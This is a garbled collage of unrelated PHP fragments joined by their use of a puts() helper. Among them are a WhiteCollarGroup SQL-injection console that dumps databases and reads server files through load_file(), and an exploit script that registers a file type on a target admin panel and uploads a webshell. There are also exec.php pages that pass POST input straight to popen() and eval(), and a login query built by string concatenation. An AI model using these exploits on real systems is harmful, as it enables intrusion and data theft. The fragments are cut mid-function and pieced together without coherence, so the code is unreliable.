function processDatabases() {
$confPath = __DIR__.'/../conf';
$confs = findConfigurationFiles($confPath);
foreach ($confs as $confFile) {
$conf = json_decode(file_get_contents($confPath.'/'.$confFile));
if (!$conf)
puts("Not a valid json file:\n".file_get_contents($confFile));
else {
$filter = new DataFilter($conf);
$filter->processDatabase();
}
}
}
function main($msg = null)
{
global $token, $token_hex;
echo "\n" . $msg . "\n";
puts("[>] MAIN MENU");
puts("[1] Browse MySQL");
puts("[2] Run SQL Query");
puts("[3] Read file");
puts("[4] About");
puts("[0] Exit");
$resp = gets();
if ($resp == "0") {
exit;
} elseif ($resp == "1") {
// pega dbs
$i = 0;
puts("[.] Getting databases:");
while (true) {
$pega = runquery("SELECT schema_name FROM information_schema.schemata LIMIT {$i},1");
if ($pega) {
puts(" - " . $pega);
} else {
break;
}
$i++;
}
puts("[!] Current database: " . runquery("SELECT database()"));
puts("[?] Enter database name for select:");
$own = array();
$own['db'] = gets();
$own['dbh'] = hex($own['db']);
// pega tables da db
$i = 0;
puts("[.] Getting tables from {$own['db']}:");
while (true) {
$pega = runquery("SELECT table_name FROM information_schema.tables WHERE table_schema={$own['dbh']} LIMIT {$i},1");
if ($pega) {
puts(" - " . $pega);
} else {
break;
}
$i++;
}
puts("[?] Enter table name for select:");
$own['tb'] = gets();
$own['tbh'] = hex($own['tb']);
// pega colunas da table
$i = 0;
puts("[.] Getting columns from {$own['db']}.{$own['tb']}:");
while (true) {
$pega = runquery("SELECT column_name FROM information_schema.columns WHERE table_schema={$own['dbh']} AND table_name={$own['tbh']} LIMIT {$i},1");
if ($pega) {
puts(" - " . $pega);
} else {
break;
}
$i++;
}
puts("[?] Enter columns name, separated by commas (\",\") for select:");
$own['cl'] = explode(",", gets());
// pega dados das colunas
foreach ($own['cl'] as $coluna) {
$i = 0;
puts("[=] Column: {$coluna}");
while (true) {
$pega = runquery("SELECT {$coluna} FROM {$own['db']}.{$own['tb']} LIMIT {$i},1");
if ($pega) {
puts(" - {$pega}");
$i++;
} else {
break;
}
}
echo "\n[ ] -+-\n";
}
main();
} elseif ($resp == "2") {
puts("[~] RUN SQL QUERY");
puts("[!] You can run a SQL code. It can returns a one-line and one-column content. You can also use concat() or group_concat().");
puts("[?] Query (enter for exit): ");
$query = gets();
if (!$query) {
main();
} else {
main(runquery($query . "\n"));
}
} elseif ($resp == "3") {
puts("[?] File path (may not have priv):");
$file = hex(gets());
$le = runquery("SELECT load_file({$file}) AS wc");
if ($le) {
main($le);
} else {
main("File not found, empty or no priv!");
}
} elseif ($resp == "4") {
puts("Coded by WhiteCollarGroup");
puts("www.wcgroup.host56.com");
puts("*****@*****.**");
puts("twitter.com/WCollarGroup");
puts("facebook.com/WCollarGroup");
puts("wcollargroup.blogspot.com");
main();
} else {
main("[!] Wrong choice.");
}
}
exit;
}
} else {
//you had a valid login
// get TA ID and name for the entire session.
$sql = "select sid from login where username = '******' and password = '******'";
$result = $db->query($sql)->fetch();
$_SESSION['ta_id'] = $result[0];
$sql = "select name_first, name_last, department from ta where sid = '{$result['0']}'";
$result = $db->query($sql)->fetch();
$_SESSION['ta_name'] = $result['name_first'] . " " . $result['name_last'];
$_SESSION['tadept'] = $result['department'];
// go to next page.
session_regenerate_id(true);
session_write_close();
header("Location:info.php");
exit;
}
} catch (PDOException $e) {
puts('Exception : ' . $e->getMessage());
$db = NULL;
}
}
}
}
//check user creds
?>
</html>
<?php
def_printfer('puts', "%s\n");
puts('base>');
_catch("first", function () {
puts('1>');
_catch("second", function () {
puts('2>');
_catch("third", function () {
puts('3>');
_throw("second");
puts('<3');
});
puts('<2');
});
puts('<1');
});
puts('<base');
?>
---
base>
1>
2>
3>
<1
<base
private function processTable($name) {
puts("-----");
puts("Processing table: $name");
$stm = $this->source->execute("select * from $name");
$count = $stm->rowCount();
puts("Row count: $count");
if($this->truncateTable($this->dest, $name))
puts("Truncated destination table.");
else
puts("An error occured truncating destination table.");
$strCols = $this->getColumnNames($stm, 'VAR_STRING', 'BLOB', 'TEXT');
$allCols = $this->getColumnNames($stm);
puts("Table columns: ".implode(', ', $allCols));
puts("Filtered columns: ".implode(', ', $strCols));
$insertStm = $this->prepareInsertStatement($this->dest, $name, $allCols);
for ($i=0; $i<$count; $i++) {
// for ($i=0; $i<min($count, 10); $i++) {
echo '- ';
$row = $stm->fetch(PDO::FETCH_BOTH);
echo $row[0];
echo ' | ';
foreach ($strCols as $colname) {
$row[$colname] = $this->filterValue($row[$colname]);
echo substr($row[$colname], 0, 10);
echo ' | ';
}
// puts(implode(', ', $this->getRowValues($row, $allCols)));
if (!$insertStm->execute($this->getRowValues($row, $allCols)))
throw new Exception('Unable to insert row: '.json_encode($row));
puts (' ;');
}
puts("All rows inserted.");
}
putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin");
putenv("SCRIPT_FILENAME=" . strtok($_POST['txtCommand'], " "));
/* PHP scripts */
$ph = popen($_POST['txtCommand'] . ' 2>&1', "r");
while ($line = fgets($ph)) {
echo htmlspecialchars($line);
}
pclose($ph);
puts(" </pre>");
}
if (!isBlank($_POST['txtPHPCommand'])) {
puts("<pre>");
require_once "config.inc";
require_once "functions.inc";
echo eval($_POST['txtPHPCommand']);
puts(" </pre>");
}
?>
<div id="niftyOutter">
<form action="exec.php" method="post" enctype="multipart/form-data" name="frmExecPlus" onsubmit="return frmExecPlus_onSubmit(this);">
<table summary="exec">
<tr>
<td colspan="2" valign="top" class="vnsepcell"><?php
echo gettext("Execute Shell command");
?>
</td>
</tr>
<tr>
<td class="label" align="right"><?php
echo gettext("Command");
?>
function try_again($str, $str2, $str3)
{
puts("");
//reset the modal
login_form($str, $str2, $str3);
}
$prefix = file_get_contents($dir . 'prefix');
}
if (file_exists($dir . 'suffix')) {
$suffix = file_get_contents($dir . 'suffix');
}
foreach (test_files($dir) as $file) {
$total++;
list($src, $result) = read_test($file);
$result = trim($result);
$eval_out = trim(eval_output($prefix . $src . $suffix));
if ($eval_out == $result) {
$correct++;
echo '.';
} else {
add_error($file, $eval_out, $result);
$fail++;
echo 'e';
}
}
}
print_all_errors();
if ($fail) {
Color::red();
} else {
Color::green();
}
puts("Correct: " . $correct);
puts("Fail: " . $fail);
puts("Total: " . $total);
Color::reset();
unlink('tmp.php');
function red($text, $line_break = true)
{
puts($text, RED, $line_break);
}
/**
* Show a nice list of statistics such as the amount of requirements, failed tests, etc.
*
* @author Yorick Peterse
* @access Private
* @static
* @return Void
*/
private static function show_statistics()
{
$tests = Colors::blue("Tests: " . self::$statistics['tests']);
$failed = Colors::red("Failed: " . self::$statistics['tests_failed']);
$success = Colors::green("Success: " . (self::$statistics['tests'] - self::$statistics['tests_failed']));
$reqs = "Requirements: " . self::$statistics['requirements'];
puts(PHP_EOL . "{$reqs} | {$tests} | {$success} | {$failed}");
}
} elseif ($c == "'" || $c == '"') {
// start of quoted string?
$quoted = TRUE;
$quote = $c;
$line .= $c;
$slash = FALSE;
} else {
$line .= $c;
}
}
}
}
}
}
if (!empty($line)) {
puts(trim($line) . "\n");
$line = '';
}
exit(0);
function getchar()
{
return fgetc(STDIN);
}
function puts($s)
{
return fwrite(STDOUT, $s, strlen($s));
}
function debug($s)
{
return;
fwrite(STDERR, $s, strlen($s));
function to_code($ast, $t = '-')
{
if (D) {
puts($t . 'AST:', $ast);
}
if (is_array($ast) && count($ast) == 1 && !$this->get_method(pos($ast))) {
$ast = pos($ast);
}
//IS IT AN ATOM?
if (!is_array($ast)) {
//is it a float or negative number?
$f = str_replace(array('__DOT', '__DSH'), array('.', '-'), $ast);
if (is_numeric($f)) {
return $f;
}
return $this->get_var($ast) && !is_numeric($ast) ? '$' . $ast : $ast;
}
//IS IT A SINGLE LIST?
if (!is_array(pos($ast))) {
$ast = array($ast);
}
//CREATE PARSED AST
$code = array();
$special_forms = array('__quote', 'lambda', 'define', 'cond', 'if', 'and', 'or', 'not', 'iapply');
foreach ($ast as $node) {
if (D) {
puts(N, $t . 'CHECK:', $node, N);
}
$method = array_shift($node);
if (in_array($method, $special_forms)) {
$args = $node;
$method = '__' . $method;
} else {
$args = array();
foreach ((array) $node as $arg) {
$args[] = $this->to_code($arg);
}
if (D) {
puts('BLIND', $args);
}
}
$code[] = $this->{$method}(empty($args) ? NULL : $args);
}
return count($code) == 1 ? array_shift($code) : $code;
}
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_URL, $target . "/admin/main.php?pg=filetypes");
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addfiletype&file_type=hack");
curl_exec($ch);
// get doc type id
puts("Trying to get new doc type ID.");
curl_setopt($ch, CURLOPT_POST, 0);
curl_setopt($ch, CURLOPT_URL, $target . "/admin/main.php?pg=filetypes");
$store = curl_exec($ch);
$numbers = array();
preg_match_all("/main\\.php\\?pg=filetypes&task=deltype&type_id=([0-9]*)/", $store, $numbers);
$tid = $numbers[1][0];
puts("New doc type ID: {$tid}", "[!]");
// upload file
puts("Trying to upload file...");
curl_setopt($ch, CURLOPT_POST, 1);
$post = array("task" => "addfile", "client_id" => $uid, "from" => "step1", "project_id" => $pid, "clid" => $uid, "task_id" => $taskid, "type_id" => $tid, "file_title" => "wcgroup", "file" => "@{$webshell}");
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);
// make file address
puts("Thinking about file address...");
$fileaddr = $target . "/clientdir/{$uid}/dl/" . basename($webshell);
puts("Exploit complete.", "[!]");
puts("You have now a webshell in <{$fileaddr}>", "[i]");
function puts($str, $type = false)
{
if (!$type) {
$type = "[*]";
}
echo $type . " " . $str . "\n";
}
print 'neutral';
}
}
//value == 50
print '"><td>' . $p->ta . '</td></tr>';
}
//don't print out blanks
}
//print out each TA
print '</tbody></table>';
}
//when we have a match, display the results.
}
//getting rows from pref.csv
fclose($fp);
} else {
puts($status);
}
}
?>
<script>
function redirectMe (sel) {
var url = sel[sel.selectedIndex].value;
window.location = url;
}
</script>
</body></html>
puts("<div class=\"panel panel-success responsive\"><div class=\"panel-heading\"><h2 class=\"panel-title\">PHP Response</h2></div>");
$tmpname = tempnam("/tmp", "");
$phpfile = fopen($tmpname, "w");
fwrite($phpfile, "<?php\n");
fwrite($phpfile, "require_once(\"/etc/inc/config.inc\");\n");
fwrite($phpfile, "require_once(\"/etc/inc/functions.inc\");\n\n");
fwrite($phpfile, $_POST['txtPHPCommand'] . "\n");
fwrite($phpfile, "?>\n");
fclose($phpfile);
$output = array();
exec("/usr/local/bin/php " . $tmpname, $output);
unlink($tmpname);
$output = implode("\n", $output);
print "<pre>" . htmlspecialchars($output) . "</pre>";
// echo eval($_POST['txtPHPCommand']);
puts("</div>");
?>
<script type="text/javascript">
//<![CDATA[
events.push(function() {
// Scroll to the bottom of the page to more easily see the results of a PHP exec command
$("html, body").animate({ scrollTop: $(document).height() }, 1000);
});
//]]>
</script>
<?php
}
?>
<div class="panel panel-default responsive">
<div class="panel-heading"><h2 class="panel-title"><?php
echo gettext('Execute PHP Commands');
<?php
require_once "plivo.php";
$auth_id = "Your AUTH_ID";
$auth_token = "Your AUTH_TOKEN";
$p = new RestAPI($auth_id, $auth_token);
# API ID is returned for every API request.
# Request UUID is request id of the call. This ID is returned as soon as the call is fired irrespective of whether the call is answered or not
$params = array('to' => '2222222222', 'from' => '1111111111', 'answer_url' => "https://glacial-harbor-8656.herokuapp.com/testing.php/speak", 'answer_method' => "GET");
# Make an outbound call
$response = $p->make_call($params);
puts("API ID : #{$response['api_id']}");
puts("Request UUID : #{$response['request_uuid']}");
/*
Sample Output
API ID : 32cba792-ae01-11e4-b153-22000abcaa64
Request UUID : 5b2db3d3-f478-4b63-992c-e47c527572e8
*/
# Call UUID is th id of a live call. This ID is returned only after the call is answered.
$params1 = array('status' => 'live');
# Get the details of all live calls
$response = $p->get_live_calls($params1);
$uuids = $response['response']['calls'];
// Looping through the call uuids
foreach ($uuids as $value) {
print_r("Call UUID : {$value} <br>");
}
/*
Sample Output
Call UUID : a60f44dc-926f-11e4-82f5-b559cbfe39b9
Call UUID : af399206-926f-11e4-8b6f-fd067af138be
putenv("PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin");
putenv("SCRIPT_FILENAME=" . strtok($_POST['txtCommand'], " "));
/* PHP scripts */
$ph = popen($_POST['txtCommand'], "r");
while ($line = fgets($ph)) {
echo htmlspecialchars($line);
}
pclose($ph);
puts("</pre>");
}
if (!isBlank($_POST['txtPHPCommand'])) {
puts("<pre>");
require_once "config.inc";
require_once "functions.inc";
echo eval($_POST['txtPHPCommand']);
puts("</pre>");
}
?>
<div id="niftyOutter">
<form action="exec.php" method="POST" enctype="multipart/form-data" name="frmExecPlus" onSubmit="return frmExecPlus_onSubmit( this );">
<table>
<tr>
<td colspan="2" valign="top" class="vnsepcell">Bir kabuk komutu çalıştır</td>
</tr>
<tr>
<td class="label" align="right">Komut:</td>
<td class="type"><input id="txtCommand" name="txtCommand" type="text" size="80" value="<?php
echo htmlspecialchars($_POST['txtCommand']);
?>
"></td>
</tr>
def('say_two', function () {
puts("Me: two");
});
say_two();
// Me: two
def_alias('say_one', 'say_two');
say_two();
// Me: one
////////////////////////////////////////
def_printfer('test_let', "calling outside let \n");
test_let();
// calling outside let
deflet(function () {
def_printfer('test_let', "calling inside let \n");
test_let();
// calling inside let
});
test_let();
// calling outside let
////////////////////////////////////////
# using namespace
def('foo\\bar\\hello', function () {
echo "Hello, World!\n";
});
foo\bar\hello();
// Hello, World!
////////////////////////////////////////
# Testing def_return
def_return('user_name', 'waserd');
puts(user_name());
// waserd